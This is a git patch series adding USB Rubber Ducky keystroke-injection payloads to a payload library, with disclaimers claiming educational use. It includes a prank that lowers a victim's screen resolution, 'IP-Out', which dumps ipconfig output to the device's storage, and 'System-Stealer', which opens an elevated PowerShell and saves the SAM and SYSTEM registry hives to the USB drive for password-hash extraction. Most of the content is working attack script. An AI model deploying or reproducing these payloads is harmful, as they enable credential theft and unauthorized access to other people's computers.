From 8073d4d9cd172d2dc1499293d5e1e2419b8cde1d Mon Sep 17 00:00:00 2001 From: mavisinator30001 <129871621+mavisinator30001@users.noreply.github.com> Date: Wed, 18 Sep 2024 07:30:59 -0700 Subject: [PATCH 01/19] Create Resolution_Prank.txt Added Resolution_Prank folder and related payload into said folder --- .../Resolution_Prank/Resolution_Prank.txt | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 payloads/library/prank/Resolution_Prank/Resolution_Prank.txt diff --git a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt b/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt new file mode 100644 index 0000000..f0eeb63 --- /dev/null +++ b/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt @@ -0,0 +1,59 @@ +REM TITLE Resolution Prank +REM AUTHOR Mavis Coffey +REM TARGET Any system running Windows 10/11 +REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back +LED_G +DELAY 500 +CTRL GUI d +DELAY 500 +GUI i +DELAY 2000 +STRING display +ENTER +DELAY 2500 +TAB +ENTER +DELAY 200 +REPEAT 8 TAB +ENTER +VAR $CAPS_STATE = $_CAPSLOCK_ON +WHILE ($CAPS_STATE == $_CAPSLOCK_ON) +HOLD DOWN +DELAY 1000 + RELEASE DOWN + ENTER + DELAY 200 + LEFT + DELAY 200 + ENTER + + REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED + VAR $LIGHT_UP_TIMES = 20 + WHILE ($LIGHT_UP_TIMES > 0) + LED_G + DELAY 300 + LED_OFF + DELAY 300 + LED_R + DELAY 300 + LED_OFF + DELAY 300 + $LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1 + END_WHILE + WAIT_FOR_CAPS_CHANGE +END_WHILE +DELAY 300 +REPEAT 12 TAB +ENTER +DELAY 200 +HOLD UP +DELAY 1000 +RELEASE UP +ENTER +DELAY 200 +LEFT +ENTER +DELAY 1000 +ALT F4 +DELAY 200 +CTRL GUI F4 From 6ad0b7836c163836984d7e54f4e7fb02a39777fe Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 20 Sep 2024 08:25:58 -0700 Subject: [PATCH 02/19] Create payload.txt Added IP-Out Ducky payload --- .../library/credentials/IP-Out/payload.txt | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 payloads/library/credentials/IP-Out/payload.txt diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt new file mode 100644 index 0000000..66735ca --- /dev/null +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -0,0 +1,21 @@ +REM Title: IP-Out +REM Author: Mavis Coffey +REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB +REM Target: Any Windows System +REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +ATTACKMODE HID STORAGE +DELAY 500 +GUI r +DELAY 300 +STRING Powershell +ENTER +DELAY 1000 +STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8 +ENTER +WAIT_FOR_STORAGE_ACTIVITY +WAIT_FOR_STORAGE_INACTIVITY +ALT F4 +ATTACKMODE OFF +REM And should the attacker want to make sure the payload was successful: +WAIT_FOR_BUTTON_PRESS +ATTACKMODE STORAGE From 8293bf5d4d014e656ff017bf2f44b927a0ee4ac8 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 20 Sep 2024 08:28:44 -0700 Subject: [PATCH 03/19] Update payload.txt Changed author comment to display my username rather than my real name --- payloads/library/credentials/IP-Out/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 66735ca..41481a9 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -1,5 +1,5 @@ REM Title: IP-Out -REM Author: Mavis Coffey +REM Author: Mavisinator30001 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB REM Target: Any Windows System REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY From cf0c83d37c939c86dd885d152406f828b64d7f86 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 20 Sep 2024 08:30:00 -0700 Subject: [PATCH 04/19] Update and rename Resolution_Prank.txt to payload.txt Changed author name to my username rather than real name. Changed payload file name to payload.txt --- .../Resolution_Prank/{Resolution_Prank.txt => payload.txt} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename payloads/library/prank/Resolution_Prank/{Resolution_Prank.txt => payload.txt} (97%) diff --git a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt b/payloads/library/prank/Resolution_Prank/payload.txt similarity index 97% rename from payloads/library/prank/Resolution_Prank/Resolution_Prank.txt rename to payloads/library/prank/Resolution_Prank/payload.txt index f0eeb63..b171cf3 100644 --- a/payloads/library/prank/Resolution_Prank/Resolution_Prank.txt +++ b/payloads/library/prank/Resolution_Prank/payload.txt @@ -1,5 +1,5 @@ REM TITLE Resolution Prank -REM AUTHOR Mavis Coffey +REM AUTHOR Mavisinator30001 REM TARGET Any system running Windows 10/11 REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back LED_G From 0f85a6936e8f97b6947101928e5689d5f90b8b23 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:09:19 -0700 Subject: [PATCH 05/19] Update payload.txt --- .../library/credentials/IP-Out/payload.txt | 55 ++++++++++++++++--- 1 file changed, 47 insertions(+), 8 deletions(-) diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 41481a9..8b2dc8e 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -2,20 +2,59 @@ REM Title: IP-Out REM Author: Mavisinator30001 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB REM Target: Any Windows System -REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +DEFINE #DRIVELABEL D +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION ATTACKMODE HID STORAGE DELAY 500 GUI r DELAY 300 -STRING Powershell -ENTER +STRINGLN Powershell DELAY 1000 -STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8 -ENTER +STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8 WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY ALT F4 ATTACKMODE OFF -REM And should the attacker want to make sure the payload was successful: -WAIT_FOR_BUTTON_PRESS -ATTACKMODE STORAGE +HIDE_PAYLOAD From a74d21e84871e42705a58bf3c7cd2d25b4b50cbd Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:16:19 -0700 Subject: [PATCH 06/19] Create readme.md --- payloads/library/credentials/IP-Out/readme.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 payloads/library/credentials/IP-Out/readme.md diff --git a/payloads/library/credentials/IP-Out/readme.md b/payloads/library/credentials/IP-Out/readme.md new file mode 100644 index 0000000..13ed7c1 --- /dev/null +++ b/payloads/library/credentials/IP-Out/readme.md @@ -0,0 +1,12 @@ +# IP-OUT +This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB. + + + + + +## Useful Tips + +**Change #DRIVELABEL to your own personal drive label if it isn't already** + +Remember: Do not use this for unethical hacking practices! This is for educational purposed only! From 5ed41467e3a6d290bf3dd9e09efbdc21df97510f Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:24:22 -0700 Subject: [PATCH 07/19] Update payload.txt --- payloads/library/credentials/IP-Out/payload.txt | 3 +++ 1 file changed, 3 insertions(+) diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 8b2dc8e..734c9d6 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -46,6 +46,9 @@ EXTENSION PASSIVE_WINDOWS_DETECT END_IF END_REM END_EXTENSION +IF $_OS != WINDOWS + STOP_PAYLOAD +END_IF ATTACKMODE HID STORAGE DELAY 500 GUI r From 566683c4289e6faa3a0e06b24247d3488f161cd0 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:25:51 -0700 Subject: [PATCH 08/19] Update payload.txt --- .../prank/Resolution_Prank/payload.txt | 50 +++++++++++++++++-- 1 file changed, 47 insertions(+), 3 deletions(-) diff --git a/payloads/library/prank/Resolution_Prank/payload.txt b/payloads/library/prank/Resolution_Prank/payload.txt index b171cf3..8761e71 100644 --- a/payloads/library/prank/Resolution_Prank/payload.txt +++ b/payloads/library/prank/Resolution_Prank/payload.txt @@ -1,15 +1,59 @@ REM TITLE Resolution Prank REM AUTHOR Mavisinator30001 REM TARGET Any system running Windows 10/11 -REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back +REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION +IF $_OS != WINDOWS + STOP_PAYLOAD +END_IF LED_G DELAY 500 CTRL GUI d DELAY 500 GUI i DELAY 2000 -STRING display -ENTER +STRINGLN display DELAY 2500 TAB ENTER From 4e8942635561336801249efd21f0f54c18542666 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 06:29:23 -0700 Subject: [PATCH 09/19] Create readme.md --- payloads/library/prank/Resolution_Prank/readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 payloads/library/prank/Resolution_Prank/readme.md diff --git a/payloads/library/prank/Resolution_Prank/readme.md b/payloads/library/prank/Resolution_Prank/readme.md new file mode 100644 index 0000000..9e116dd --- /dev/null +++ b/payloads/library/prank/Resolution_Prank/readme.md @@ -0,0 +1,5 @@ +# Resolution Prank + +This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed. + +### Somewhat resource dependent, may not work on older computers From c8c6a75d33f3a79809d2faa138465bbae60a3392 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 07:42:03 -0700 Subject: [PATCH 10/19] Rename readme.md to README.md --- payloads/library/prank/Resolution_Prank/{readme.md => README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/prank/Resolution_Prank/{readme.md => README.md} (100%) diff --git a/payloads/library/prank/Resolution_Prank/readme.md b/payloads/library/prank/Resolution_Prank/README.md similarity index 100% rename from payloads/library/prank/Resolution_Prank/readme.md rename to payloads/library/prank/Resolution_Prank/README.md From 420a174f938c3bd6df09e838d90dcb91ee4767cb Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 26 Sep 2024 07:42:38 -0700 Subject: [PATCH 11/19] Rename readme.md to README.md --- payloads/library/credentials/IP-Out/{readme.md => README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/credentials/IP-Out/{readme.md => README.md} (100%) diff --git a/payloads/library/credentials/IP-Out/readme.md b/payloads/library/credentials/IP-Out/README.md similarity index 100% rename from payloads/library/credentials/IP-Out/readme.md rename to payloads/library/credentials/IP-Out/README.md From a323fc328137866175223a13798ace9af0f761d1 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Tue, 15 Oct 2024 14:10:08 -0400 Subject: [PATCH 12/19] Update payload.txt --- payloads/library/credentials/IP-Out/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index 734c9d6..c9746ef 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -54,8 +54,8 @@ DELAY 500 GUI r DELAY 300 STRINGLN Powershell -DELAY 1000 -STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8 +DELAY 1000DEFINE #DRIVELABEL DUCKY +STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY ALT F4 From 1a5aa0bd0828103ce7bf09ea7e658d42748cf6da Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 18 Oct 2024 11:26:00 -0400 Subject: [PATCH 13/19] Update payload.txt --- payloads/library/credentials/IP-Out/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index c9746ef..016761b 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -54,7 +54,8 @@ DELAY 500 GUI r DELAY 300 STRINGLN Powershell -DELAY 1000DEFINE #DRIVELABEL DUCKY +DELAY 1000 +DEFINE #DRIVELABEL DUCKY STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY From 083951025f87474a1b98bd2c69712637569778a3 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Fri, 18 Oct 2024 14:43:32 -0400 Subject: [PATCH 14/19] Added System-Stealer to exfiltration library --- .../exfiltration/System-Stealer/payload.txt | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 payloads/library/exfiltration/System-Stealer/payload.txt diff --git a/payloads/library/exfiltration/System-Stealer/payload.txt b/payloads/library/exfiltration/System-Stealer/payload.txt new file mode 100644 index 0000000..85d2db0 --- /dev/null +++ b/payloads/library/exfiltration/System-Stealer/payload.txt @@ -0,0 +1,70 @@ +REM TITLE System Stealer +REM AUTHOR mavisinator30001 +REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both +REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise! +REM DISCLAIMER This is for educational purposes ONLY +DELAY 1000 +ATTACKMODE HID STORAGE +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION +IF ($_OS == WINDOWS) THEN + INJECT_MOD GUI R + DELAY 500 + STRING cmd + DELAY 1000 + CTRL-SHIFT-ENTER + DELAY 750 + LEFT + ENTER + DELAY 1000 + REM Change $DRIVELABEL to the storage label of your duck + DEFINE #DRIVELABEL D: + STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save + WAIT_FOR_STORAGE_ACTIVITY + WAIT_FOR_STORAGE_INACTIVITY + STRINGLN reg save HKLM\system #DRIVELABEL/system.save + WAIT_FOR_STORAGE_ACTIVITY + WAIT_FOR_STORAGE_INACTIVITY +ELSE + STOP_PAYLOAD +END_IF From 81807425f59d96cbbe590f41a4603fdb218d0701 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Mon, 21 Oct 2024 11:56:10 -0400 Subject: [PATCH 15/19] Create payload.txt --- .../library/exfiltration/IP-Out/payload.txt | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 payloads/library/exfiltration/IP-Out/payload.txt diff --git a/payloads/library/exfiltration/IP-Out/payload.txt b/payloads/library/exfiltration/IP-Out/payload.txt new file mode 100644 index 0000000..016761b --- /dev/null +++ b/payloads/library/exfiltration/IP-Out/payload.txt @@ -0,0 +1,64 @@ +REM Title: IP-Out +REM Author: Mavisinator30001 +REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB +REM Target: Any Windows System +REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY +DEFINE #DRIVELABEL D +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION +IF $_OS != WINDOWS + STOP_PAYLOAD +END_IF +ATTACKMODE HID STORAGE +DELAY 500 +GUI r +DELAY 300 +STRINGLN Powershell +DELAY 1000 +DEFINE #DRIVELABEL DUCKY +STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } +WAIT_FOR_STORAGE_ACTIVITY +WAIT_FOR_STORAGE_INACTIVITY +ALT F4 +ATTACKMODE OFF +HIDE_PAYLOAD From 63e0c186187553f62893f79b9513317207c8fd42 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Mon, 21 Oct 2024 11:56:43 -0400 Subject: [PATCH 16/19] Create README.md --- payloads/library/exfiltration/IP-Out/README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 payloads/library/exfiltration/IP-Out/README.md diff --git a/payloads/library/exfiltration/IP-Out/README.md b/payloads/library/exfiltration/IP-Out/README.md new file mode 100644 index 0000000..13ed7c1 --- /dev/null +++ b/payloads/library/exfiltration/IP-Out/README.md @@ -0,0 +1,12 @@ +# IP-OUT +This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB. + + + + + +## Useful Tips + +**Change #DRIVELABEL to your own personal drive label if it isn't already** + +Remember: Do not use this for unethical hacking practices! This is for educational purposed only! From 8be0f9a0923d61839862ec6c348d18ba436bc4a5 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Mon, 21 Oct 2024 11:57:10 -0400 Subject: [PATCH 17/19] Delete payloads/library/credentials/IP-Out directory --- payloads/library/credentials/IP-Out/README.md | 12 ---- .../library/credentials/IP-Out/payload.txt | 64 ------------------- 2 files changed, 76 deletions(-) delete mode 100644 payloads/library/credentials/IP-Out/README.md delete mode 100644 payloads/library/credentials/IP-Out/payload.txt diff --git a/payloads/library/credentials/IP-Out/README.md b/payloads/library/credentials/IP-Out/README.md deleted file mode 100644 index 13ed7c1..0000000 --- a/payloads/library/credentials/IP-Out/README.md +++ /dev/null @@ -1,12 +0,0 @@ -# IP-OUT -This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB. - - - - - -## Useful Tips - -**Change #DRIVELABEL to your own personal drive label if it isn't already** - -Remember: Do not use this for unethical hacking practices! This is for educational purposed only! diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt deleted file mode 100644 index 016761b..0000000 --- a/payloads/library/credentials/IP-Out/payload.txt +++ /dev/null @@ -1,64 +0,0 @@ -REM Title: IP-Out -REM Author: Mavisinator30001 -REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB -REM Target: Any Windows System -REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY -DEFINE #DRIVELABEL D -EXTENSION PASSIVE_WINDOWS_DETECT - REM VERSION 1.1 - REM AUTHOR: Korben - - REM_BLOCK DOCUMENTATION - Windows fully passive OS Detection and passive Detect Ready - Includes its own passive detect ready. - Does not require additional extensions. - - USAGE: - Extension runs inline (here) - Place at beginning of payload (besides ATTACKMODE) to act as dynamic - boot delay - $_OS will be set to WINDOWS or NOT_WINDOWS - See end of payload for usage within payload - END_REM - - REM CONFIGURATION: - DEFINE #MAX_WAIT 150 - DEFINE #CHECK_INTERVAL 20 - DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 - DEFINE #NOT_WINDOWS 7 - - $_OS = #NOT_WINDOWS - - VAR $MAX_TRIES = #MAX_WAIT - WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) - DELAY #CHECK_INTERVAL - $MAX_TRIES = ($MAX_TRIES - 1) - END_WHILE - IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN - $_OS = WINDOWS - END_IF - - REM_BLOCK EXAMPLE USAGE AFTER EXTENSION - IF ($_OS == WINDOWS) THEN - STRING HELLO WINDOWS! - ELSE - STRING HELLO WORLD! - END_IF - END_REM -END_EXTENSION -IF $_OS != WINDOWS - STOP_PAYLOAD -END_IF -ATTACKMODE HID STORAGE -DELAY 500 -GUI r -DELAY 300 -STRINGLN Powershell -DELAY 1000 -DEFINE #DRIVELABEL DUCKY -STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } -WAIT_FOR_STORAGE_ACTIVITY -WAIT_FOR_STORAGE_INACTIVITY -ALT F4 -ATTACKMODE OFF -HIDE_PAYLOAD From 61eb88ab6c0b5e52ce7aafa6283483bce9fc8148 Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Tue, 22 Oct 2024 14:41:32 -0400 Subject: [PATCH 18/19] Update payload.txt --- .../exfiltration/System-Stealer/payload.txt | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/payloads/library/exfiltration/System-Stealer/payload.txt b/payloads/library/exfiltration/System-Stealer/payload.txt index 85d2db0..23fdd6c 100644 --- a/payloads/library/exfiltration/System-Stealer/payload.txt +++ b/payloads/library/exfiltration/System-Stealer/payload.txt @@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT END_IF END_REM END_EXTENSION +REM Change $DRIVELABEL to the storage label of your duck +DEFINE #DRIVELABEL DUCKY IF ($_OS == WINDOWS) THEN - INJECT_MOD GUI R + GUI r DELAY 500 - STRING cmd + STRING powershell DELAY 1000 CTRL-SHIFT-ENTER DELAY 750 LEFT ENTER DELAY 1000 - REM Change $DRIVELABEL to the storage label of your duck - DEFINE #DRIVELABEL D: - STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save + STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter + DELAY 250 + STRINGLN reg save HKLM\sam $DriveLetter/sam.save WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY - STRINGLN reg save HKLM\system #DRIVELABEL/system.save + STRINGLN reg save HKLM\system $DriveLetter/system.save WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY + ALT F4 ELSE + ATTACKMODE OFF STOP_PAYLOAD END_IF From cacb21ad7e7a3e4de47b1b30d3361079c012b4fc Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 24 Oct 2024 14:58:57 -0400 Subject: [PATCH 19/19] Removed Second "#DRIVELABEL" variable --- payloads/library/exfiltration/IP-Out/payload.txt | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/IP-Out/payload.txt b/payloads/library/exfiltration/IP-Out/payload.txt index 016761b..111d444 100644 --- a/payloads/library/exfiltration/IP-Out/payload.txt +++ b/payloads/library/exfiltration/IP-Out/payload.txt @@ -3,7 +3,7 @@ REM Author: Mavisinator30001 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB REM Target: Any Windows System REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR 